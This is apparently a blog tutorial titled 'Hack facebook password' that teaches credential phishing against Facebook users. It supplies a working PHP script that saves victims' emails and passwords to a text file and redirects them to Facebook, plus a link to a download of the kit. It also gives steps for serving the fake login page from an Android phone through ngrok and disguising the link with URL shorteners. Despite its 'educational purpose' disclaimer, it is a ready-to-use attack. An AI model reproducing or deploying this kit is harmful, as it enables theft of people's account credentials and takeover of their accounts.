Hack facebook password



Phishing remains the foremost well-liked attack vector used to hack facebook account. There area unit varied ways to hold out phishing attack. In easy phishing attacks, a hacker creates a fake login page that precisely sounds like the real Facebook page so asks the victim to log in.

Once the victim logs in through the fake page the, the victims “Email Address” and “Password” is keep into a document, and also the hacker then downloads the document and gets his hands on the victim’s credentials.

Note : This post is only for educational purpose and I'm not responsible for any illegal work done by you.

So before doing phishing attack you will need a free web hosting but here I am making my android mobile as a web server.

To make a web server you need to install these below application in your android mobile.


1. Termux application in Android phone

2. Kick Web Server
3. Ngrok

By using this trick there is no need to buy any free web hosting or any kind of My SQL database. You just need only PHP Script to fetch the details from the victim and for designing we will use HTML and CSS files.

But before doing these all stuff !! make sure you have read the Phishing Attack post so that you can move further.







Login.php

Below code will fetch the values from login form and create a usernames.txt file into the htdocs folder. In this file you will see the victim username and password.

<?php
file_put_contents("usernames.txt", "Account: " . $_POST['email'] . " Pass: " . $_POST['pass'] . "\n", FILE_APPEND);
header('Location: https://www.facebook.com');
exit();
?>

Index.php
This file will redirect to the login.html file.


<?php

header('Location: login.html');
exit();

?>




Steps for Phishing Attack :

Step-1 : Download the files from here ➡️_https://drive.google.com/open?id=1qzBOn-SmtVJEPSuY2OxBuH3f3brP1QB_


Step-2 : Extract the files and put it into the htdocs folder

Step-3 : Run the Kick web server. Make sure your kick web server in On condition during this process otherwise it will not open the phishing page.

Step-4 : Open the termux application and type ./ngrok http 8080 and you will get this screen like this. Basically Ngrok will create a secure tunnel between you and victim.






As you can see in upper image there are 2 links provided by Ngrok Http & Https. You can Send one of the link to the victim. Ahh! this URL looks fake we can do one thing. To increase the success rate we can use URL shortner websites.

For Example : Google URL Shortner, Bitly 


Here in this post I have create my own Android web server but you can also purchase free domain name from other free hosting service provider.

You can put those files into their servers. To do that you can read this post also

Get free hosting to do Phishing Attack.

Subscribe my News feed to get the latest post Updates .

Till Now Good Bye and Take Care.

My Facebook Page:https://www.facebook.com/beginnerstrackofficial/

My Linkedin Page:https://www.linkedin.com/in/beginners-track-a661331a8

My Twitter Page:https://twitter.com/beginnerstracko?s=09

My Instagram Page:https://www.instagram.com/beginnerstrackofficial/?hl=en

My Pinterest Page:https://www.pinterest.com/beginnerstrackofficial/

Author: ADITYA YADAV

I am a blogger and Tech Geek and hacking lover. He loves to keep eyes on Hacking tips and tricks. He is a night time tech blogger."(Blogger by Passion)"

Previous
Next Post »